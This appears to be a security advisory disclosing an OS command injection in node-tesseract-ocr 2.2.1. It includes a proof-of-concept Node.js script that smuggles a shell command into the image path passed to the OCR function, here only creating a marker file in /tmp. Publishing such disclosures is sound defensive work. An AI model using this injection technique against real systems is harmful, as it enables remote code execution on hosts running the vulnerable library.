CVSS 9.8 / 10 (CRITICAL)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
In node-tesseract-ocr version 2.2.1, a security vulnerability allows OS command injection when attacker-controlled image paths are passed to the OCR function...
Basic Information
ID: PACKETSTORM:219822
Published: Apr 27, 2026 at 00:00
Affected Product: node-tesseract-ocr (as named in the advisory title below)
Affected Versions: 2.2.1
==================================================================================================================================
| # Title : node-tesseract-ocr 2.2.1 OS Command Injection via Unsanitized Image Path Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/node-tesseract-ocr |
==================================================================================================================================
[+] Summary : In node-tesseract-ocr version 2.2.1, a security vulnerability allows OS command injection when attacker-controlled image paths are passed to the OCR function.
[+] POC : exploit-basic.js
const tesseract = require('node-tesseract-ocr');

// Image path carrying shell metacharacters; the advisory states the library
// passes the unsanitized path to the OS shell.
const maliciousImagePath = 'test.jpg"; touch /tmp/pwned.txt; echo "x';
const config = {
  lang: 'eng',
  oem: 1,
  psm: 3,
};

console.log("[+] CVE-2026-26832 - node-tesseract-ocr OS Command Injection Exploit");
console.log("[+] Malicious image path:", maliciousImagePath);
console.log("[+] Attempting to recognize text...");

tesseract.recognize(maliciousImagePath, config)
  .then(text => {
    console.log("[+] OCR completed (injection might still have worked)");
    console.log("Extracted text:", text);
  })
  .catch(error => {
    console.log("[!] OCR failed (but command may have executed before the error)");
    console.log("Error:", error.message);
  })
  .finally(() => {
    console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
    console.log("[*] If the file exists, the exploit was successful!");
  });
node-tesseract-ocr 2.2.1
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================